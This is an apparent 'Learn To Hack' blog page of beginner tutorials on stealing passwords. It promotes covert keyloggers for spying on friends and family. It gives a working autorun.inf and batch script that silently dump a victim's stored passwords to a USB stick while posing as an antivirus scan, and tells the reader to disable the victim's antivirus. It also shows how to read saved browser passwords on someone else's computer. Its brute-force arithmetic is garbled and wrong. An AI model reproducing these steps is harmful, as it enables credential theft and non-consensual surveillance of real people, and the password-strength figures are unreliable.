Showing posts with label Password Hacking. Show all posts

Hacking With A Keylogger - How To Steal Passwords


For the beginner hacker, or someone who just needs access to something quickly, keyloggers are the easiest, most user friendly tools to use, especially for certain tasks. If you don't already know, a keylogger is a program that can be installed on a target computer and stealthily record and log everything that goes on on that computer, ready to report back to the hacker. Some people use keyloggers to monitor their kids or employees but they can also be used to hack into accounts.

The downside of hacking with a keylogger is that you need to have access to the computer you want to run it on (although certain keyloggers can be sent via email). This means that the sort of jobs keyloggers are perfect for include; stealing a Facebook or email password from a friend or family member, or seeing what websites they visit when no ones around. Once the keyloggers been installed you can either retrieve it with a secret key combination to view the logs, or have to logs sent to you via email, without anyone knowing.

The keylogger (also known as Computer Monitoring Software) will automatically record all passwords once it starts monitoring, along with where the passwords were entered. Most keyloggers will have a tab that monitors websites, a tab that monitors applications and a tab that monitors keystrokes. All you'll have to do is look at the keystrokes tab, scroll to the website that you need the password for and see what was typed first – almost always the user name and password.

You'll also be able to see screenshots, taken periodically that will show what the target user has been doing in his accounts. Activities like reading and sending emails, looking at photos on Facebook and elsewhere on the web will all be recorded for you to look through. You can also customize the way the keylogger works, how often screenshots are taken and when to start monitoring. You can even uninstall the software stealthily at any time and they'll never know they've been monitored!

All of this is easy to set up and use, as keyloggers are designed for the average user, not the pro hacker. As well as monitoring keystrokes, websites and taking screenshots, most Computer Monitoring Software will monitor all applications used, documents opened or saved, items copied to the clipboard and more, all with the dates and times of when these activities happened. In fact keyloggers are the perfect spying tool, which you can now get for phones as well as computers.

If you're interested in learning more about keyloggers check out Gecko Monitor, which has a free trial and all of the features mentioned above. You can download Gecko Monitor by heading to http://www.GeckoMonitor.com
Saturday, September 22, 2012
Posted by Anonymous

How to turn your USB into HACKING USB

The article is written to tell people how to make their USB into a Hacking USB. Which you Just have to insert into a Persons Computer and all of the Stored Password in that computer will be stored into the USB.

THE THINGS YOU NEED:

1) A USB DRIVE at least 100mb
2) MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications: (DOWNLOAD HERE)
3) Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc (DOWNLAOD HERE)
4) Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. (DOWLOAD HERE)
5) IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer.(DOWNLOAD HERE)
6) Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox. (DOWNLOAD HERE)
NOTE: TURN OFF THE ANTIVIRUS DURING DOWNLOAD.


HOW TO PREPARE USB:

Now You have downloaded all the files copy their setup into USB (e.g. mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe)

STEP 1) Now open a new notepad and Type following command as it is:


=======================================================
[autorun]
open=launch.bat

ACTION = ANTIVIRUS CHEAK

Now save this notepad as autorun.inf (remember to choose All files from save as type.)


STEP 2) Now Open a New Notepad and Copy following command as it is.

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Now save this files as launch.bat (remember to choose All files from save as type)

STEP 3) Copy all the setups , autorun.inf , launch.bat to USB.

Now when you will insert the USB into the Computer of the Victim the Setup will Show that it is Scanning while it will steal all the Passwords from the Computer.

NOTE: Turn Off the Antivirus from the Victim’s Computer.
Monday, November 22, 2010
Posted by Anonymous

Cain and Abel - Best software for hacking for New Hackers

Cain and Abel (sometimes called simply "Cain") is a Windows password recovery tool. It can recover many kinds of passwords using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force and cryptanalysis attacks. Cryptanalysis attacks are done via rainbow tables which can be generated with the winrtgen.exe program provided with Cain and Abel. Cain and Abel is maintained by Massimiliano Montoro.


Cain & Abel is a useful tool for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons.

Status with virus scanners
Some virus scanners, notably Avast! detect Cain and Abel as 'malware' "Win32:Cain-B [Tool]". It's classified in Avast! as "Other potentially dangerous program". The author, and owner of oxid.it states that his programs are not Malware. Even if Cain's install directory, as well as the word "Cain", are added to Avast's exclude list, the real-time scanner will stop Cain from functioning. The latest version of Avast no longer blocks

How to hack a Computer with Cain and Able:


The latest version is faster and contains a lot of new features like ARP (Arp Poison Routing) which enables sniffing on switched LANs
and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and some not so common utilities related to network and system security.


Download Cain and Able from (www.oxid.it)

Features:
1.WEP cracking
2.Speeding up packet capture speed by wireless packet injection
3.Ability to record VoIP conversations
4.Decoding scrambled passwords
5.Calculating hashes
6.Traceroute
7.Revealing password boxes
8.Uncovering cached passwords
9.Dumping protected storage passwords
10.ARP spoofing
11.IP to MAC Address resolver
12.Network Password Sniffer
Posted by Anonymous

How to recover or Hack MSN password.

It is a nightmare if you have forgotten the password of your MSN or LIVE account and forgetting the security account make it worse.

I have found about a Software called MSN Hacker that can recover the MSN password on the Computer which you use .

Step1) First of all download the MSN hacker from (http://www.ziddu.com/downloadlink/4240875/password-recovery-for-msn-setup.exe )

Step 2) Run it.

Step 3) Click on “Recover Password”

Is it not easy.

How does it Work. This software searches the Local Computer for the Stored Passwords and usually get the passwords.

NOTE: For hacking with this password you should Hack the Access to the persons computer.
Posted by Anonymous

How to Hack a friends account with Firefox and Chrome

Well this way is really easy and very efficient the only thin you want is access to your friends computer and at least 45 seconds.

With FIREFOX.

The following are the steps to do it:

Step 1: Open the firefox.

Step 2: Go to Tools -> Options -> Privacy -> Passwords

Step 3: There you will find the Show Password button , Just click on it.

Step 4: Now you can see the Password along with Websites. Note them down ;)

With Chrome.

Step 1: Open Chrome

Step 2: Goto settings -> Options

Step 3: Goto Personal stuff -> Show saved passwords

Impress you friend.


WARNING: You can be punched on nose if you do something stupid with his/her accounts.
Posted by Anonymous

How to hack a PDF password for free

Are you curios to hack pdf passwords? Want to unlock a Pdf Password protected file. Here is a simple and easy way to unlock PDF files and view them, Followin are the two great sites which will do this work.


1. Freemypdf.com ( http://freemypdf.com/ )



Freemypdf.com is a free website that allows you to view restricted Pdf files.Use this site to remove passwords and restrictions (such as printing, copying text, etc.) from PDFs.


Note: This only works for PDFs that you can open and read without any 3rd party plugins. PDFs that require a password to be viewed cannot be unlocked by this service.
This is because this is not cracking. Viewable PDFs with restrictions are not really protected, no more than a door with a broken lock, as opposed to password-protected PDFs.


2.Pdf-crack.jsf (http://www.ensode.net/pdf-crack.jsf)


Another great site which allows you to hack a Pdf password.To unlock a PDF file, enter it's location in the "PDF file to unlock" field, by either typing it in the field or clicking on the "browse" button, then navigating to it's location.


The unlocked version of the PDF will be displayed in a new browser window, opened in the default PDF application for your system (usually Adobe Acrobat Reader)
Posted by Anonymous

BRUTE-FORCE ATTACK.

Brute Force Attack is the most widely known password cracking method. This attack simply tries to use every possible character combination as a password. To recover a one-character password it is enough to try 26 combinations (‘a’ to ‘z’). It is guaranteed that you will find the password


.. but when? How long will it take? The two-character password will require 26*26=676 combinations. The number of possible combinations (and therefore required time) grows rapidly as the length of the password increases and this method quickly becomes useless. Do you ready to wait for two months while your 9-character password is cracked? What about one hundred years for an 11-character password? Besides the maximal length of the character set you should also specify the character set i.e. the list of characters that will be included in the combinations. The longer the character set is, the longer the required period of time is. Here is the problem: usually you have no idea of what characters are present in the password. On the one hand, you should specify all possible characters. On the other hand, this can slow things down very much. Unfortunately, there are no common ways to determine what character set to use. It is more a question of luck and intuition. The only thing I can recommend is to begin with trying short passwords using the full character set. Then you can increase the length of password simultaneously decreasing the character set to keep the required time good acceptable.

If the password is case sensitive (this is the most common situation), there is another problem with the case.




There are three options:



1) you can assume that the password was typed in lower case (this is most likely). In this case, the required time will stay the same but if the password contains upper case letters it will not be recovered.


2) you can try all combinations.



The password is guaranteed to be found, but the process slows down significantly. A 7-character lower case password requires about 4 hours to be recovered but if you would like to try all combinations of upper case and lower case letters, it will require 23 days. 3) The third method is trade-off. Only the most probable combinations are taken into consideration, for example "password", "PASSWORD" and "Password". The complicated combinations like "pAssWOrD" are not. In this particular case the process slows down to one third of original speed but there is still a possibility to fail.

How to create strong passwords?

Following is the example of how the password becomes strong with variation on characters.

For Example My name is Haseeb.


PASSWORD POSSIBILITIES
Haseeb = 6^26 = 11881376
HaSeEb = 6^ 676 = Out of range

So by using variation you can create stronger password.
Posted by Anonymous

Popular Post

Labels

- Copyright © _.:Learn To Hack:._ :: Hacking Tutorials :: Warez -Metrominimalist- Powered by Blogger - Designed by Johanes Djogan -